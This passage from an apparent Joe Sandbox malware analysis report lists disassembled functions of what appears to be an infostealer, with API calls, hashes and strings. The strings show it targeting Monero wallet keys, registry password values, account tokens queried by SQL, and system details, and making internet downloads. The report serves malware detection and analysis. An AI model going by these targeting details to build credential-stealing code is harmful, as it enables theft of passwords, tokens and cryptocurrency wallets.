                          • Part of subcall function 005E99C0: CloseHandle.KERNEL32(000000FF), ref: 005E9A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 005E14EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 3478931302-218353709
                        • Opcode ID: 54dabc7b8eabc20f6f808459c873bfdcb4086cfbdeef351a7ef7106211f10800
                        • Instruction ID: da0d9a1fefbc8f62c9c18d4b08544aba907826a030c5e81588e17bfd019e58b9
                        • Opcode Fuzzy Hash: 54dabc7b8eabc20f6f808459c873bfdcb4086cfbdeef351a7ef7106211f10800
                        • Instruction Fuzzy Hash: 295130F195011E5BCB19EB60DD95AFD773CBF90300F4041A8B74A62091EE746B89CAA6
                        Function 005E75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005E72D0: memset.MSVCRT ref: 005E7314
                          • Part of subcall function 005E72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 005E733A
                          • Part of subcall function 005E72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005E73B1
                          • Part of subcall function 005E72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 005E740D
                          • Part of subcall function 005E72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 005E7452
                          • Part of subcall function 005E72D0: HeapFree.KERNEL32(00000000), ref: 005E7459
                        • lstrcat.KERNEL32(00000000,006017FC), ref: 005E7606
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005E7648
                        • lstrcat.KERNEL32(00000000, : ), ref: 005E765A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005E768F
                        • lstrcat.KERNEL32(00000000,00601804), ref: 005E76A0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005E76D3
                        • lstrcat.KERNEL32(00000000,00601808), ref: 005E76ED
                        • task.LIBCPMTD ref: 005E76FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                        • String ID: :
                        • API String ID: 3191641157-3653984579
                        • Opcode ID: 5e92cf0b9fddc5deee3a6c79dc6fdbac275c600b9e87f747231922cc3f087e1b
                        • Instruction ID: c08452cccc1066ae2d6c8674d3dad0b5b5cf87c3796ebc0e94188b6173e85b14
                        • Opcode Fuzzy Hash: 5e92cf0b9fddc5deee3a6c79dc6fdbac275c600b9e87f747231922cc3f087e1b
                        • Instruction Fuzzy Hash: 03314B7590014AEBCB1CEBA5DC89DFF7B79BF98301B108118F106A7290DB34A947CB52
                        Function 005E72D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 005E7314
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 005E733A
                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005E73B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 005E740D
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 005E7452
                        • HeapFree.KERNEL32(00000000), ref: 005E7459
                        • task.LIBCPMTD ref: 005E7555
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuememsettask
                        • String ID: Password
                        • API String ID: 2808661185-3434357891
                        • Opcode ID: eba5e731eb6f7880d3beba836865dc861dbecf0ddc822f0985ffd949e7c0587d
                        • Instruction ID: 4f397b90fd393904d491312706cf66be9d226b3f214e19f20a5a709ee5abb9f2
                        • Opcode Fuzzy Hash: eba5e731eb6f7880d3beba836865dc861dbecf0ddc822f0985ffd949e7c0587d
                        • Instruction Fuzzy Hash: 09613FB590415D9BDB28DB51DC45FEABBB8BF48300F0081E9E689A6181DB705FC9CFA1
                        Function 005F8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0115E620,00000000,?,00600E2C,00000000,?,00000000), ref: 005F8130
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F8137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 005F8158
                        • __aulldiv.LIBCMT ref: 005F8172
                        • __aulldiv.LIBCMT ref: 005F8180
                        • wsprintfA.USER32 ref: 005F81AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2774356765-3474575989
                        • Opcode ID: 5f2e9b515db2b3c8c8e610ec6c31b2edc60efc241d885f07e6a3ca0c42664afe
                        • Instruction ID: 1c4b2dc61d0c87b69bfe83c3d09cfa07f0ce312a99defaaa7090d811a3b2cfc0
                        • Opcode Fuzzy Hash: 5f2e9b515db2b3c8c8e610ec6c31b2edc60efc241d885f07e6a3ca0c42664afe
                        • Instruction Fuzzy Hash: 622127B1A44208ABDB14DFD4CC49FBEBBB9FB44B00F104619F705AB280C77869018BA5
                        Function 005E60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                          • Part of subcall function 005E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005E4839
                          • Part of subcall function 005E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005E4849
                        • InternetOpenA.WININET(00600DF7,00000001,00000000,00000000,00000000), ref: 005E610F
                        • StrCmpCA.SHLWAPI(?,0115E7B8), ref: 005E6147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 005E618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 005E61B3
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 005E61DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 005E620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 005E6249
                        • InternetCloseHandle.WININET(?), ref: 005E6253
                        • InternetCloseHandle.WININET(00000000), ref: 005E6260
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID:
                        • API String ID: 2507841554-0
                        • Opcode ID: f7a0ad0ddc7ba4ad2fde1976c66e11f3485b1c91a2e8623d0990d8713b88ab75
                        • Instruction ID: 5e067d985f188a45ba239230992b9521e37967fdfc40c30e3d2d949912935cb3
                        • Opcode Fuzzy Hash: f7a0ad0ddc7ba4ad2fde1976c66e11f3485b1c91a2e8623d0990d8713b88ab75
                        • Instruction Fuzzy Hash: D2519FB1900209AFDB28DF51DC49BEE7BB8FF44340F008098A745A71C0DB746A86CF96
                        Function 005EBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                        • lstrlen.KERNEL32(00000000), ref: 005EBC9F
                          • Part of subcall function 005F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 005F8E52
                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 005EBCCD
                        • lstrlen.KERNEL32(00000000), ref: 005EBDA5
                        • lstrlen.KERNEL32(00000000), ref: 005EBDB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 3073930149-1079375795
                        • Opcode ID: 1dea62b5275204605f2748de62198b9cc3225254fe2aa62924a150c9b67db6dd
                        • Instruction ID: a9df70112269354acd92730e87cecb7b15b4a4c7c8488ae48ca1767421afc4c1
                        • Opcode Fuzzy Hash: 1dea62b5275204605f2748de62198b9cc3225254fe2aa62924a150c9b67db6dd
                        • Instruction Fuzzy Hash: 26B154B19101099BDB18EBA0CD5ADFE7B39BF94340F404128F60A67095EF786A49CB63
                        Function 005F6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: *
                        • API String ID: 1494266314-163128923
                        • Opcode ID: 7f1dfbe2e37f54f781a7935dd2677b8abee396945f551736de126aefda67050c
                        • Instruction ID: f768ce4f7509c97586659bf476c5577df6098e7da6ab3fa60b8e745d2935c985
                        • Opcode Fuzzy Hash: 7f1dfbe2e37f54f781a7935dd2677b8abee396945f551736de126aefda67050c
                        • Instruction Fuzzy Hash: C0F05E3090520DEFD358AFE0E90972CBB70FF14703F048198E649C62D0D6744B42DB9A
                        Function 005E4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 005E4FCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005E4FD1
                        • InternetOpenA.WININET(00600DDF,00000000,00000000,00000000,00000000), ref: 005E4FEA
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 005E5011
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 005E5041
                        • InternetCloseHandle.WININET(?), ref: 005E50B9
                        • InternetCloseHandle.WININET(?), ref: 005E50C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                        • String ID:
                        • API String ID: 3066467675-0
                        • Opcode ID: fd058687f3605e1fd7814bfce8d046bc64cb669c1ef0b569c006ada39ec8a1c2
                        • Instruction ID: e186443fb6d2f8697a153aeaaf2803aefcc8ea961d84b74041357b74ca672f25
                        • Opcode Fuzzy Hash: fd058687f3605e1fd7814bfce8d046bc64cb669c1ef0b569c006ada39ec8a1c2
                        • Instruction Fuzzy Hash: 243107B4A40218ABDB24CF54CC89BDCB7B5FB48704F5081E9FB09A7281D7706A858F99
                        Function 005F83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 005F8426
                        • wsprintfA.USER32 ref: 005F8459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 005F847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 005F848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 005F8499
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                        • RegQueryValueExA.ADVAPI32(00000000,0115E608,00000000,000F003F,?,00000400), ref: 005F84EC
                        • lstrlen.KERNEL32(?), ref: 005F8501
                        • RegQueryValueExA.ADVAPI32(00000000,0115E518,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00600B34), ref: 005F8599
                        • RegCloseKey.ADVAPI32(00000000), ref: 005F8608
                        • RegCloseKey.ADVAPI32(00000000), ref: 005F861A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
                        • Opcode ID: 4a288b9e1a913d59a34d056ef86759b4ff15620108eb86dda8fba0f61b075f80
                        • Instruction ID: 0e4c49dad18a73cd83a711c6ed9e975cf5e69a62d390621ca60c48af576b3122
                        • Opcode Fuzzy Hash: 4a288b9e1a913d59a34d056ef86759b4ff15620108eb86dda8fba0f61b075f80
                        • Instruction Fuzzy Hash: 8D21E7B191021CABDB28DB54DC85FE9B7B8FF48700F00C599A609A6180DF75AA86CFD5
                        Function 005F7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005F76A4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F76AB
                        • RegOpenKeyExA.ADVAPI32(80000002,0114BEF8,00000000,00020119,00000000), ref: 005F76DD
                        • RegQueryValueExA.ADVAPI32(00000000,0115E590,00000000,00000000,?,000000FF), ref: 005F76FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 005F7708
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
